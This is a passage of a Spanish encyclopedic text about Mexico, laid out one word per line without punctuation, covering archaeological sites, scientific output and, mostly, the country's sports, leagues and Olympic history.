\nconstante\ncrecimiento\nMéxico\ncuenta\ncon\ntres\nPremios\nNobel\nEn\nMéxico\nsegún\ninformación\ndel\nInstituto\nNacional\nde\nAntropología\ne\nHistoria\nI.N.A.H\nen\ndiciembre\nde\n2005\nse\ntenían\nregistrados\n37\n266\nsitios\narqueológicos\nen\nMéxico\nLos\nsitios\narqueológicos\nson\naquellos\ndonde\nhan\nsido\nencontradas\nevidencias\nde\nocupación\nhumana\nanterior\ny\nno\nnecesariamente\ncorresponden\na\nsitios\nprehispánicos\naunque\nla\nmayor\nparte\nlo\nsean\nPor\nejemplo\nen\nMonterrey\nNuevo\nLeón\nexiste\nun\nmuseo\nsobre\narqueología\nindustrial\nEn\nla\nCiudad\nde\nMéxico\nlos\narqueólogos\nhan\nrescatado\nrestos\nmateriales\nde\nun\nconvento\ncolonial\nque\nse\nlocalizó\nen\nel\nmismo\nsitio\ndonde\nestá\nactualmente\nel\nPalacio\nde\nBellas\nArtes\nComo\nse\nha\ndicho\nexisten\nnumerosos\nsitios\npertenecientes\na\nlos\npueblos\nprehispánicos\nmiles\nde\nellos\naunque\nno\ntodos\nestán\nabiertos\nal\npúblico\nLa\nzona\nque\nconcentra\nla\nmayor\nparte\nde\nestos\nsitios\nes\nel\nárea\nmaya\nseguida\npor\nel\nCentro\nde\nMéxico\ny\nlos\nvalles\nde\nOaxaca\nLa\nley\nmexicana\nconsidera\nmonumentos\nhistóricos\naquellos\nconstruidos\nentre\nlos\nsiglos\nXVI\ny\nXIX\nes\ndecir\ndesde\nla\nllegada\nde\nlos\nespañoles\nhasta\nel\nsiglo\nanterior\nTanto\nlas\nzonas\narqueológicas\ncomo\nlos\nmonumentos\nhistóricos\nson\nconsiderados\ncomo\npatrimonio\nde\nla\nnación\nmexicana\ny\nson\ncustodiados\npor\nel\nI.N.A.H\ny\nel\nInstituto\nNacional\nde\nBellas\nArtes\nI.N.B.A\nForman\nparte\ndel\ncomplejo\nde\nmonumentos\nhistóricos\nlos\nnúcleos\noriginales\nde\nvarias\npoblaciones\nimportantes\ndel\npaís\ncomo\nCiudad\nde\nMéxico\nGuanajuato\nPuebla\nde\nZaragoza\nOaxaca\nde\nJuárez\ny\nSan\nFrancisco\nde\nCampeche\ntodas\nellas\nreconocidas\nademás\ncomo\nPatrimonio\nCultural\nde\nla\nHumanidad\npor\nla\nUnesco\nAdemás\nde\nestos\ngrandes\naglomerados\nexisten\nnumerosas\nconstrucciones\ndispersas\npor\ntodo\nel\npaís\nque\nforman\nparte\ndel\ncatálogo\nd
el\nI.N.A.H\nA\nfinales\ndel\nsiglo\nXIX\ncomenzó\nel\nproceso\nde\nindustrialización\nel\ncual\nrepresentó\ngrandes\navances\nen\nciencia\ny\ntecnología\ndurante\nel\nsiglo\nsiguiente\nDurante\nel\nsiglo\nXX\nse\nfundaron\nnuevos\ninstitutos\nde\ninvestigación\ny\nuniversidades\ncomo\nla\nUniversidad\nNacional\nAutónoma\nde\nMéxico\nDe\nacuerdo\ncon\ndatos\nde\nScopus\nuna\nbase\nde\ndatos\nbibliográfica\nde\nresúmenes\ny\ncitas\nde\nartículos\nde\nrevistas\ncientíficas\nMéxico\nse\nposiciona\nen\nel\nlugar\nnúmero\n28\ndel\nmundo\nen\nmateria\nde\npublicaciones\ncientíficas\nsiendo\nel\nsegundo\nen\nAmérica\nLatina\ndespués\nde\nBrasil\ny\nel\nsegundo\nentre\nlos\npaíses\nhispanoparlantes\ndespués\nde\nEspaña\nAdemás\nocupa\nel\nlugar\nnúmero\n34\nde\npaíses\nordenados\npor\nÍndice\nh\ncon\nun\npuntaje\nde\n232\nMéxico\nes\nuno\nde\nlos\npaíses\ncon\nmás\ngalardones\ndel\nPremio\nen\nCiencias\nde\nla\nUnesco\nSin\nembargo\ndurante\n2012\nMéxico\nfue\nel\npaís\nde\nla\nOCDE\nque\nmenos\ninvirtió\nen\ninvestigación\ny\ndesarrollo\ncon\nun\naproximado\nde\n0,47\ndel\nPIB\nEl\n20\nde\nabril\nde\n2010\nla\nCámara\nde\nDiputados\naprobó\nla\niniciativa\npara\nla\ncreación\nde\nla\nAgencia\nEspacial\nMexicana\nla\nley\nfue\npromulgada\nel\n13\nde\njulio\nde\n2010\ny\nfue\npublicada\nen\nel\nDiario\nOficial\nde\nla\nFederación\nel\n30\nde\njulio\nde\n2010\nCon\nfrecuencia\nse\nle\ndenomina\na\nla\ncharrería\ncomo\nel\ndeporte\nnacional\nde\nlos\nmexicanos\nEste\ndeporte\nes\nderivado\nde\nlas\nfaenas\nde\nlos\ncaporales\nen\nlas\nhaciendas\nganaderas\nSu\norigen\ndata\nde\nla\népoca\ncolonial\ny\nse\natribuye\na\nMaximiliano\nde\nHabsburgo\nla\ncreación\ndel\ntraje\nde\ncharro\nen\nsu\nforma\ndefinitiva\nAlgunos\ndeportes\ntienen\nun\norigen\nen\nlas\nculturas\nprehispánicas\nde\nMesoamérica\nTal\nes\nel\ncaso\nde\nla\npelota\ntarasca\nla\npelota\npurépecha\nla\npelota\nmixteca\nde\nOaxaca\ny\nel\nulama\nde\nSinaloa\ntodos\nestos\nvinculados\ncon\nel\nantiguo\njuego\nde\n
pelota\npracticado\npor\nlos\npueblos\nmesoamericanos\nEste\njuego\nde\npelota\ndramatizaba\nel\nmovimiento\nde\nlos\nastros\nen\nel\nfirmamento\ny\nen\nteoría\nsus\ndescendientes\nactuales\ntambién\nlo\nhacen\nclaro\nestá\nque\nahora\nlos\nequipos\nvencidos\nno\nson\nsacrificados\na\nlos\ndioses\nEn\nChihuahua\nlos\ntarahumaras\nrealizan\ncarreras\nrituales\nllamadas\nrarajípara\ny\nariweta\nLa\nprimera\nes\npara\nvarones\ny\nes\njugada\nen\nequipos\nque\nse\nrelevan\npara\ncompletar\nun\nrecorrido\nde\nvarios\nkilómetros\npor\nla\nsierra\npateando\nuna\npequeña\npelota\nLa\nsegunda\nes\npara\nmujeres\ny\nellas\ndeben\nhacer\nel\nrecorrido\nempujando\nun\naro\nSi\nbien\nla\nSecretaría\nde\nEducación\nPública\nincluye\nla\nenseñanza\nde\nla\neducación\nfísica\nen\nlas\nescuelas\na\nsu\ncargo\ncomo\nhacen\ntambién\nlas\ninstancias\nestatales\nencargadas\nde\nla\ninstrucción\nen\nel\npaís\nel\ndeporte\norganizado\nno\nes\nuna\nactividad\ncomún\nentre\nel\npueblo\nEl\nmás\nextendido\nsea\nquizá\nel\nfútbol\naunque\nen\nel\nnorte\ndel\npaís\ntienen\nmayor\npresencia\nel\nbásquetbol\nel\nbéisbol\ny\nel\nsófbol\nestos\ndos\núltimos\ntambién\ncon\nmuy\nbuena\naceptación\nen\nel\nsur\ndel\npaís\nen\nel\nsur\nde\nla\nCiudad\nde\nMéxico\nla\npráctica\naficionada\ndel\nfrontón\ny\nla\npelota\nvasca\nes\nmuy\nimportante\ny\nha\ndado\nlustre\nal\ndeporte\nmexicano\na\nnivel\ninternacional\nCon\nel\ncreciente\naumento\nde\nun\nmercado\nde\njugadores\ntanto\ninfantil\ncomo\njuvenil\nel\ndeporte\nextremo\nde\nraqueta\nel\nracketball\ngoza\nde\nun\nconstante\ndesarrollo\nEl\npatinaje\nartístico\nsobre\nhielo\ny\nel\nhockey\nsobre\nhielo\nson\ndeportes\npracticados\npor\nla\njuventud\nmexicana\nacomodada\nmostrando\nun\nconstante\ncrecimiento\nOtros\ndeportes\nque\ngozan\nde\ngran\npopularidad\nen\nMéxico\nson\nel\nvoleibol\nel\ncual\nse\npráctica\ncomo\nuno\nde\nlos\ndeportes\nbásicos\na\nnivel\nescolar\nasí\ncomo\nel\nfútbol\namericano\nel\ncual\nse\npractica\nde\nmanera\norganizad
a\nen\ndiversas\nligas\nintegrantes\nde\nla\nONEFA\nEl\ndeporte\nmás\npopular\ny\nde\nmayor\ndifusión\nen\nel\npaís\nes\nel\nfútbol\no\ncomo\nse\nescribe\ny\npronuncia\nen\nel\npropio\npaís\nfutbol\nLa\nliga\nmexicana\nestá\ncompuesta\npor\ncuatro\ndivisiones\néstas\nson\nla\nLiga\nMX\nla\nLiga\nde\nAscenso\nla\nSegunda\nDivisión\ny\nla\nTercera\nDivisión\nademás\nde\nuna\nLiga\nFemenil\nLa\nselección\nmayor\nde\nfútbol\nha\nparticipado\nen\n15\nCopas\nMundiales\nsiendo\nsus\nmejores\nacutaciones\nlas\nfases\nde\ncuartos\nfinal\nalcanzadas\ncuando\nfue\nsede\nen\n1970\ny\n1986\ntiene\n10\ntítulos\ncontinentales\nde\nCopa\nde\nOro\nde\nla\nConcacaf\nsiendo\nel\nconjunto\ncon\nmás\ntítulos\ndel\ntorneo\nademás\nde\ntener\nun\ntítulo\ninternacional\nen\nla\nCopa\nFIFA\nConfederaciones\nen\n1999\ntambién\nha\nparticipado\nen\nla\nCopa\nAmérica\ndonde\nha\nsido\nsubcampeón\nen\ndos\nocasiones\n1993\ny\n2001\ny\ntercer\nlugar\nen\ntres\nocasiones\nEl\nestadio\noficial\npara\nsus\njuegos\ncomo\nanfitrión\nes\nel\nEstadio\nAzteca\nsede\nde\nuno\nde\nlos\nequipos\nde\nfútbol\nreconocido\nnacionalmente\nel\nClub\nAmérica\nque\nostenta\nel\nmayor\nnúmero\nde\ntítulos\ninternacionales\ncon\ndiez\nen\ntotal\nsiete\nen\nla\nLiga\nde\nCampeones\nde\nla\nConcacaf\nuno\nde\nla\nCopa\nGigantes\nde\nla\nConcacaf\ny\ndos\nde\nCopa\nInteramericana\nA\nsu\nvez\nocupa\nel\npuesto\n14\na\nnivel\nmundial\nen\ncuanto\na\nmás\ntítulos\ninternacionales\nganados\nLa\nselección\nolímpica\nganó\nla\nmedalla\nde\noro\nen\nlos\nJuegos\nOlímpicos\nde\nLondres\n2012\nmientras\nque\nla\nselección\nde\nfútbol\nsub-17\nse\ncoronó\nen\ndos\nocasiones\ndentro\nde\nla\nCopa\nMundial\nde\nFútbol\nSub-17\nen\nPerú\n2005\ny\nMéxico\n2011\nLa\nselección\nsub-20\nfue\nsubcampeona\nen\nel\nCampeonato\nMundial\nde\nTúnez\n1977\ny\ntercer\nlugar\nen\nColombia\n2011\nLa\nselección\nde\nfútbol\nplaya\nfue\nsegundo\nlugar\nen\nla\nCopa\nMundial\nde\n2007\nNota\nEn\nla\npronunciación\ny\nortografía\ndel\nespañol\nmexi
cano\nse\nusa\nla\nvariante\nbeisbol\nOtro\ndeporte\ncon\ngran\ntradición\nprofesional\nes\nel\nbéisbol\nescrito\ny\npronunciado\nbeisbol\nlocalmente\nel\ncual\nsegún\nlas\núltimas\nencuestas\nes\nel\ntercer\ndeporte\nmás\npopular\nen\nMéxico\nEl\nbéisbol\nes\nel\ndeporte\nmás\npopular\nen\nlas\nregiones\nnorte\ny\nsureste\nMéxico\ncuenta\ncon\nvarias\nligas\nprofesionales\nentre\nlas\nque\ndestacan\nla\nLiga\nMexicana\nde\nBéisbol\nLMB\ny\nla\nLiga\nMexicana\ndel\nPacífico\nLMP\nLa\npopularidad\nde\nla\nLMB\nse\ndebe\na\nque\nlos\nequipos\ncon\nlos\nque\ncuenta\nestán\ndistribuidos\npor\ncasi\ntodo\nel\npaís\nes\nla\nde\nmayor\ntradición\npues\nfue\nfundada\nen\n1925\ny\nha\naportado\nla\nmayoría\nde\nlos\npeloteros\nmexicanos\nque\nllegan\na\nlas\nGrandes\nLigas\nestá\nafiliada\na\nlas\nLigas\nMenores\nde\nlos\nEstados\nUnidos\nbajo\nla\nclasificación\nAAA\ny\ntiene\nsu\npropia\nacademia\nde\ndesarrollo\nde\ntalentos\nubicada\nen\nEl\nCarmen\nNuevo\nLeón\nla\nconforman\nactualmente\n16\nequipos\ndivididos\nen\n2\nzonas\nZona\nNorte\ny\nZona\nSur\nLa\nLMP\nse\njuega\nen\ninvierno\npor\nlo\nque\nsu\ntemporada\nes\nmás\ncorta\ny\nrecibe\na\nalgunos\nde\nlos\npeloteros\nmexicanos\ny\nextranjeros\nque\nen\nverano\nestán\njugando\nen\nlas\nGrandes\nLigas\nestá\nintegrada\npor\nequipos\nde\nBaja\nCalifornia\nJalisco\nNuevo\nLeón\nSinaloa\ny\nSonora\ntiene\nimportancia\na\nnivel\nnacional\ndebido\na\nque\nel\nequipo\ncampeón\nrepresenta\na\nMéxico\nen\nel\nmayor\nevento\nbeisbolístico\nde\nla\nregión\nla\nSerie\ndel\nCaribe\nen\nla\nque\ntambién\njuegan\nlos\ncampeones\nde\nlas\nligas\nde\nColombia\nPanamá\nPuerto\nRico\nRepública\nDominicana\ny\nVenezuela\nEste\ntorneo\nha\nsido\nganado\nen\nnueve\nocasiones\npor\nescuadras\nmexicanas\nOtras\nligas\nreconocidas\nen\nMéxico\nson\nla\nLiga\nInvernal\nVeracruzana\nLIV\ncuyo\nequipo\ncampeón\nrepresentó\na\nMéxico\nen\nla\nSerie\nLatinoamericana\nla\nLiga\nInvernal\nde\nBéisbol\nNayarita\nLIBN\nla\nLiga\nNorte\nde\nMéxico\nL
NM\nla\nLiga\nNorte\nde\nSonora\nLNS\nla\nLiga\nMayor\nde\nBéisbol\nde\nLa\nLaguna\nLMBL\nla\nLiga\nEstatal\nde\nBéisbol\nde\nChihuahua\nLEB\nla\nLiga\ndel\nNorte\nde\nCoahuila\nLNC\nla\nLiga\nInvernal\nMexicana\nLIM\nla\nLiga\nPeninsular\nde\nBéisbol\nLPB\nla\nLiga\nMeridana\nde\nInvierno\nLMI\nla\nLiga\nVeracruzana\nEstatal\nde\nBéisbol\nLVEB\ncuyo\nequipo\ncampeón\nrepresenta\nen\nla\nactualidad\na\nMéxico\nen\nla\nSerie\nLatinoamericana\ny\nla\nLiga\nTabasqueña\nde\nBéisbol\nLTB\nlas\ncuales\nson\nde\nmenor\nnivel\ndebido\na\nque\nla\nmayoría\nde\nsus\njugadores\nson\nveteranos\no\njóvenes\nen\ndesarrollo\nque\nen\nel\nfuturo\nllegarán\na\nla\nLMB\ny\nla\nLMP\nEn\nel\nClásico\nMundial\nde\nBéisbol\n2006\nel\ncombinado\nmexicano\ndio\nla\ngrata\nsorpresa\nal\navanzar\nel\nprimero\nen\nsu\ngrupo\npara\nser\neliminado\nen\nla\nsiguiente\nronda\nal\nperder\nante\nJapón\ny\nCorea\ndel\nSur\nno\nsin\nantes\neliminar\na\nlos\nEstados\nUnidos\nel\nanfitrión\ndel\nevento\nEn\nla\nedición\nde\n2009\nMéxico\ntuvo\nla\nsede\ndel\nForo\nSol\nen\nla\nronda\npreliminar\nEn\nla\nedición\nde\n2017\nMéxico\nvolvió\na\ntener\nla\noportunidad\nde\nser\nsede\nen\nla\nronda\npreliminar\nsiendo\nel\nEstadio\nPanamericano\nde\nZapopan\nel\nescenario\nque\nacogió\nlos\njuegos\npertenecientes\nal\nGrupo\nD\ncompuesto\npor\nlos\ncombinados\nnacionales\nde\nMéxico\nPuerto\nRico\nVenezuela\ne\nItalia\nEn\nla\nCopa\nMundial\nde\nBéisbol\nMéxico\ncuenta\ncon\n4\nmedallas\nde\nplata\ny\nuna\nde\nbronce\nfue\nsede\ndel\nevento\nen\nla\nedición\nde\n1951\nNota\nEn\nla\npronunciación\ny\nortografía\ndel\nespañol\nmexicano\nse\nusa\nla\nvariante\nbasquetbol\nEl\nsegundo\ndeporte\nde\nconjunto\nmás\npracticado\nen\nel\npaís\nes\nel\nbásquetbol\nescrito\ny\npronunciado\nbasquetbol\nen\nel\npropio\npaís\nsin\nembargo\nes\nel\ncuarto\nmás\npopular\ndespués\ndel\nfútbol\nel\nboxeo\ny\nel\nbéisbol\nActualmente\nla\nliga\nmás\nimportante\nen\nel\npaís\nen\neste\ndeporte\nes\nla\nLiga\nNacional\nde\nBalon
cesto\nProfesional\nLNBP\ny\nen\nla\nrama\nfemenil\nla\nLiga\nMexicana\nde\nBaloncesto\nProfesional\nFemenil\nLMBPF\nademás\nde\nalgunas\nligas\nregionales\ncomo\nel\nCircuito\nde\nBaloncesto\nde\nla\nCosta\ndel\nPacífico\nCIBACOPA\ny\nel\nCircuito\nde\nBaloncesto\ndel\nPacífico\nCIBAPAC\nque\ncomo\nsus\nnombres\nlo\nindican\nlas\ncomponen\nequipos\nde\nesa\nzona\nasí\ncomo\nla\nLiga\nde\nBaloncesto\ndel\nSureste\nLBS\nque\nincluye\na\nlos\nequipos\nde\nesa\nparte\ndel\npaís\nel\nCircuito\nde\nBásquetbol\ndel\nNoreste\nCIBANE\nque\ncomo\nsu\nnombre\nlo\nindica\nlo\ncomponen\nequipos\nde\nesa\nregión\nla\nLiga\nPremier\nde\nBaloncesto\nLPB\ny\nla\nLiga\nde\nBásquetbol\nEstatal\nde\nChihuahua\nLBE\nambas\ncon\nbase\nen\nel\nestado\nde\nChihuahua\nEstas\nligas\nregionales\ntienen\nparticipación\nen\nlos\nmeses\nde\ndescanso\nde\nla\nLNBP\nque\ndicho\nsea\nde\npaso\nvolverá\na\ntener\ncompetencia\nante\nel\ninminente\nregreso\ndel\nCircuito\nMexicano\nde\nBásquetbol\nCIMEBA\nel\ncual\nfue\ndurante\nmucho\ntiempo\nla\nprincipal\nliga\nde\nbásquetbol\nprofesional\nen\nMéxico\nEl\nmayor\néxito\ndel\nbaloncesto\nmexicano\nes\nla\nmedalla\nde\nbronce\nen\nlos\nJuegos\nOlímpicos\nde\nBerlín\n1936\nEn\nel\n2013\nse\nformó\nla\nLiga\nMexicana\nde\nVoleibol\nLMV\ncon\nel\naval\nde\nla\nFederación\nMexicana\nde\nVoleibol\nFMVB\nmisma\nque\nentró\nen\nvigor\nen\n2014\nen\nambas\nramas\ndando\nlugar\na\nla\nLiga\nMexicana\nde\nVoleibol\nVaronil\nLMVV\ny\na\nla\nLiga\nMexicana\nde\nVoleibol\nFemenil\nLMVF\nEsto\ncon\nel\nobjetivo\nde\nque\nambos\ncircuitos\nfueran\nla\nbase\npara\nintegrar\na\nlas\nselecciones\nnacionales\nde\ncara\nal\nciclo\nolímpico\nde\nRío\nde\nJaneiro\n2016\nya\nque\nse\nformaron\nequipos\nde\nvarias\npartes\ndel\npaís\ncon\nla\nfinalidad\nde\nobservarlos\nNo\nobstante\neste\nno\nfue\nel\nprimer\nintento\nde\nuna\nliga\nprofesional\nde\nvoleibol\nen\nMéxico\nya\nque\nanteriormente\nla\nLiga\nPremier\nde\nVoleibol\nLPV\ntambién\nse\ndesarrolló\nen\nambas\nramas
\nLos\nmayores\néxitos\ndel\nvoleibol\nmexicano\nfueron\nlas\nmedallas\nde\noro\ny\nplata\nen\nlas\nramas\nfemenil\ny\nvaronil\nrespectivamente\nde\nlos\nJuegos\nPanamericanos\nde\n1955\nNota\nEn\nla\npronunciación\ny\nortografía\ndel\nespañol\nmexicano\nse\nusa\nla\nvariante\nfutbol\nEn\nel\n2016\nse\nformó\nla\nLiga\nde\nFútbol\nAmericano\nProfesional\nLFA\ncon\nel\nrespaldo\nde\nla\nFederación\nMexicana\nde\nFútbol\nAmericano\nFMFA\nmisma\nque\nentró\nen\nvigor\nen\nfebrero\nde\ndicho\naño\ncon\n4\nequipos\n3\nde\nla\nCiudad\nde\nMéxico\ny\n1\ndel\nEstado\nde\nMéxico\nteniendo\ncomo\nsede\nel\nEstadio\nJesús\nMartínez\nPalillo\nde\nla\nCiudad\nDeportiva\nde\nLa\nMagdalena\nMixiuhca\nEn\nla\nactualidad\nestá\nconformada\npor\nocho\nequipos\ntres\nde\nellos\nde\nla\nCiudad\nde\nMéxico\ndos\ndel\nEstado\nde\nMéxico\nuno\nde\nCoahuila\nuno\nde\nNuevo\nLeón\ny\nuno\nmás\nde\nPuebla\nAdemás\nen\n2018\nse\nfundó\nla\nLiga\nFútbol\nAmericano\nde\nMéxico\nFAM\nque\nactualmente\nestá\nconformada\npor\ncinco\nequipos\nde\nlas\nentidades\nde\nChihuahua\nCiudad\nde\nMéxico\nEstado\nde\nMéxico\nJalisco\ny\nQuerétaro\nDe\nforma\nparalela\nexiste\nla\nOrganización\nNacional\nEstudiantil\nde\nFútbol\nAmericano\nque\ndesde\n1930\ny\ncon\ndistintas\ndenominaciones\nha\norganizado\ncampeonatos\nnacionales\nde\neste\ndeporte\nLa\nLiga\nMexicana\nElite\nde\nHockey\nLMEH\nfue\ninaugurada\nel\n2\nde\noctubre\nde\n2010\ncon\nel\nobjetivo\nde\nestablecer\nel\nhockey\nsobre\nhielo\nde\nMéxico\na\nun\nalto\nnivel\ninternacional\nEsto\nse\nlogró\ncon\nla\nparticipación\nconjunta\nde\ninversión\nprivada\ny\nlos\nequipos\nprofesionales\nde\nhockey\nya\nexistentes\nen\nel\npaís\nEn\nla\nactualidad\nestá\nconformada\npor\ncuatro\nequipos\ntodos\nde\nellos\nde\nla\nCiudad\nde\nMéxico\nLa\npelota\nvasca\nen\nMéxico\nse\npractica\ndesde\n1895\naproximadamente\ny\nestá\nrepresentada\npor\nla\nFederación\nMexicana\nde\nFrontón\nA.C\nLa\nconforman\nactualmente\n17\nespecialidades\nde\nparticipación\ni
nternacional\ny\nse\npractican\nen\nel\npaís\n26\nen\ntotal\nBasta\ndecir\nque\nen\nMéxico\nsurgió\nen\nel\naño\nde\n1916\nuna\nnueva\nespecialidad\ndentro\nde\nla\npelota\nel\nfrontenis\nA\npartir\nde\nsu\niniciación\nlas\nrepresentaciones\nmexicanas\nhan\nganado\nen\ntodas\nlas\nediciones\nde\nlos\n12\nCampeonatos\nMundiales\nque\nse\nhan\ncelebrado\nhasta\nla\nfecha\nexceptuando\nLa\nHabana\n1990\nEn\nla\nactualidad\nse\ntiene\nun\ndesarrollo\ncuya\nestructura\ncuenta\nen\nsu\nbase\ncon\n2\nCategorías\nInfantiles\ny\n3\nJuveniles\nconformadas\npor\ndeportistas\nentre\nlos\n8\ny\n21\naños\nSe\nrealiza\nun\nCampeonato\nNacional\nde\ncada\nEspecialidad\ny\nCategoría\nque\nestá\ndividido\nen\n3\nFases\nlogrando\nasí\nun\ntotal\nde\n120\nEventos\nAnuales\nque\ntambién\ncontempla\nel\ndesarrollo\nde\nla\nPrimera\nFuerza\nen\nalgunas\nSegunda\ny\nTercera\nademás\nde\nlos\nVeteranos\nse\ntiene\nun\nSistema\nde\nClasificación\npor\npuntuación\nel\ncual\nnos\napoya\nfirmemente\npara\nconformar\nlas\nSelecciones\ny\nPreselecciones\nNacionales\nLa\nFederación\nMexicana\nde\nFrontón\nA.C\ncontempla\ndos\nmodalidades\nDobles\ny\nSingles\npara\nlas\nespecialidades\nque\nson\nCesta\nPunta\nVaronil\nFrontón\nCubano\nVaronil\nFrontón\na\nMano\ncon\nPelota\nDura\nen\nTres\nParedes\ny\nen\nTrinquete\nVaronil\nPala\nCorta\nVaronil\nPaleta\ncon\nPelota\nde\nCuero\nen\n3\nParedes\ny\nen\nTrinquete\nVaronil\nPaleta\ncon\nPelota\nde\nGoma\nen\n3\nParedes\nVaronil\ny\nen\nTrinquete\nFemenil\ny\nVaronil\nasí\ncomo\nFrontenis\nFemenil\ny\nVaronil\nLa\nCiudad\nde\nMéxico\ntiene\nla\npoblación\nde\nmás\ncanchas\npara\nla\npráctica\nde\nla\npelota\nvasca\nen\nel\nmundo\nEs\nla\ndisciplina\ndeportiva\nque\nmás\nmedallas\ny\ntítulos\nen\ncampeonatos\nmundiales\nha\notorgado\nal\ndeporte\nmexicano\ncon\nun\ntotal\nde\n123\npreseas\n50\nde\noro\n41\nde\nplata\ny\n32\nde\nbronce\nla\nmitad\nde\nlos\nmetales\ndorados\nprovienen\nde\nla\ndisciplina\ncreada\nen\nMéxico\nel\nfrontenis\nMéxico\nes\nuna\
nde\nlas\ntres\npotencias\nmundiales\nde\neste\ndeporte\njunto\na\nEspaña\ny\nFrancia\ncon\nquienes\nsiempre\ndisputa\nel\nmedallero\nde\nlos\ncampeonatos\nmundiales\nde\nla\nespecialidad\nFue\ndisciplina\nde\nexhibición\nen\nlos\nJuegos\nOlímpicos\nde\nMéxico\n1968\ny\nen\nlos\nJuegos\nOlímpicos\nde\nBarcelona\n1992\nEn\naquellas\nocasiones\nMéxico\nobtuvo\n2\nmedallas\nde\noro\ny\n3\nde\nbronce\nen\n1968\nasí\ncomo\n3\nde\noro\n2\nde\nplata\ny\n2\nde\nbronce\nen\n1992\nEl\nboxeo\ny\nla\nlucha\nlibre\ngozan\nigualmente\nde\nbuena\nreputación\ny\npopularidad\nEn\nla\nprimera\ndisciplina\nboxeadores\nmexicanos\nhan\nsido\ncampeones\nmundiales\ny\nolímpicos\ntales\ncomo\nSalvador\nSánchez\nJulio\nCésar\nChávez\nJosé\nLuis\nRamírez\nCarlos\nZárate\nRubén\nOlivares\nÉrik\nel\nTerrible\nMorales\nentre\notros\nHoy\nen\ndía\nen\nel\nbox\nfiguran\nnuevas\npromesas\nmundiales\ncomo\nSaúl\nEl\nCanelo\nÁlvarez\nJulio\nCésar\nChávez\nJr\nLa\nlucha\nlibre\nhay\nque\ndecir\nque\nes\nun\ndeporte\ncon\nuna\ngran\nafición\nllena\nde\ngrandes\nmitos\ncomo\nEl\nSanto\nenmascarado\nde\nplata\no\nsu\nrival\nBlue\nDemon\ny\nalgunos\nluchadores\nque\nestán\nen\nel\ncentro\nde\nsu\ncarrera\ncomo\nSin\nCara\ny\nAlberto\ndel\nRío\naunque\núltimamente\nlas\nprincipales\nempresas\nde\nlucha\nlibre\nhan\ndejado\ndel\nlado\nel\naspecto\ndeportivo\npara\nconvertirla\nen\nun\nespectáculo\nno\npor\nello\nmenos\natractivo\npara\nel\npúblico\nLa\nfiesta\ntaurina\nes\ntambién\nmuy\nseguida\nsobre\ntodo\nen\nel\ncentro\ndel\npaís\nsiendo\nla\nplaza\nmás\nimportante\nLa\nMonumental\nPlaza\nde\nToros\nde\nMéxico\nmejor\nconocida\ncomo\nla\nPlaza\nMéxico\nOtros\ndeportes\nque\nse\npractican\nen\nMéxico\nlas\ncarreras\nde\ncaballos\nque\ntienen\ncomo\nescenario\nprincipal\nal\nHipódromo\nde\nlas\nAméricas\nde\nla\nCiudad\nde\nMéxico\nlas\ncarreras\nde\ngalgos\nen\nel\nGalgódromo\nde\nAgua\nCaliente\nde\nTijuana\ny\nen\nel\nde\nCiudad\nJuárez\nMéxico\ntuvo\nsu\nprimera\nparticipación\nen\nel\nesquí\nOlímpic
o\nen\nlos\nJuegos\nOlímpicos\nde\nInvierno\nde\nSarajevo\n1984\nhaciendo\npresencia\ncon\nel\nmexicano\nde\norigen\nalemán\nHubertus\nVon\nHohenlohe\nen\nla\ncategoría\nde\nesquí\nalpino\nLos\npocos\nmexicanos\nque\nhan\ncompetido\nen\nlos\nJuegos\nOlímpicos\nde\ninvierno\nnunca\nhan\nobtenido\nalguna\npresea\nEl\nesquí\nen\nMéxico\nes\nconsiderado\ncomo\nun\ndeporte\nde\nélite\nmuy\npocos\nmexicanos\npractican\nlos\ndeportes\ninvernales\npor\nla\nfalta\nde\ndifusión\ne\ninstalaciones\ndentro\ndel\nterritorio\nde\nese\npaís\nEl\nhockey\nsobre\nhielo\ny\nel\npatinaje\nsobre\nhielo\nha\nempezado\na\nser\ndifundido\nen\nel\nterritorio\nnacional\nse\nhan\nestado\nformando\nlas\nprimeras\nescuelas\ne\ninstalaciones\nal\nmomento\nsolo\nhay\ndemostraciones\ntemporales\ncon\ndeportistas\nmexicanos\nbastante\njóvenes\nque\nincursionan\nen\nestos\ndeportes\nMéxico\nha\nsido\nsede\ndel\nCampeonato\nde\nMundo\nde\nPádel\nen\n2002\nen\nla\nCiudad\nde\nMéxico\ny\nen\n2010\nen\nCancún\nMéxico\ntambién\nfue\nsede\ndel\nVIII\nCampeonato\nMundial\nde\nPolo\n2008\nEntre\nlos\ndeportes\nque\nse\npractican\nde\nmanera\nprofesional\nen\nMéxico\nson\nel\nautomovilismo\ncuyo\nescenario\nprincipal\nes\nel\nAutódromo\nHermanos\nRodríguez\nAsimismo\nen\nlos\núltimos\naños\nse\nhan\nrealizado\nfechas\noficiales\ndentro\ndel\ncalendario\noficial\ndel\nWorld\nRally\nChampionship\nque\nes\nla\ncompetencia\nautomovilística\nde\nla\ncategoría\nde\nRallies\nmás\nimportante\ndel\nmundo\ny\ncuenta\ncon\nla\naprobación\nde\nla\nFIA\nFederación\nInternacional\ndel\nAutomóvil\npor\nsus\nsiglas\nen\nfrancés\ny\nse\nlleva\na\ncabo\nen\nlas\nciudades\nde\nLeón\nde\nlos\nAldamas\nSilao\nde\nla\nVictoria\ny\nGuanajuato\nen\nel\nestado\nde\nGuanajuato\nDicha\ncompetición\ncada\naño\nha\nlogrado\natraer\na\nmás\nfanáticos\nde\nla\ncategoría\ndel\npaís\ny\ndel\nmundo\nademás\nde\ngenerar\nimportantes\nderramas\neconómicas\npara\nel\nestado\nDesde\nel\naño\n2015\nel\nAutódromo\nHermanos\nRodríguez\nacoge\nuna\nc
arrera\nde\nFórmula\n1\nnuevamente\ndespués\nde\n23\naños\nde\nausencia\nPese\na\nno\ncontar\ncon\nun\ncomité\nolímpico\nconstituido\nMéxico\nparticipó\npor\nprimera\nvez\nen\nlos\nJuegos\nen\n1900\nen\nParís\nTres\nhermanos\nManuel\nPablo\ny\nEustaquio\nEscandón\nBarrón\nparticiparon\nen\nel\nTorneo\nde\nPolo\nobteniendo\nla\ntercera\nposición\nen\nEl\nGran\nPremio\nde\nla\nExposición\nEsta\nvictoria\nse\nconsidera\noficialmente\nla\nprimera\nmedalla\nolímpica\nde\nMéxico\nMéxico\nfue\nel\nprimer\npaís\nde\nAmérica\nLatina\nen\nser\nsede\nde\nlos\nJuegos\nOlímpicos\nde\nverano\nen\n1968\nLa\nceremonia\nde\ninauguración\nse\nrealizó\nel\n12\nde\noctubre\nen\nconmemoración\nde\nla\nllegada\nde\nCristóbal\nColón\nal\nllamado\nNuevo\nMundo\nEntre\nlas\nnovedades\nque\npresentó\n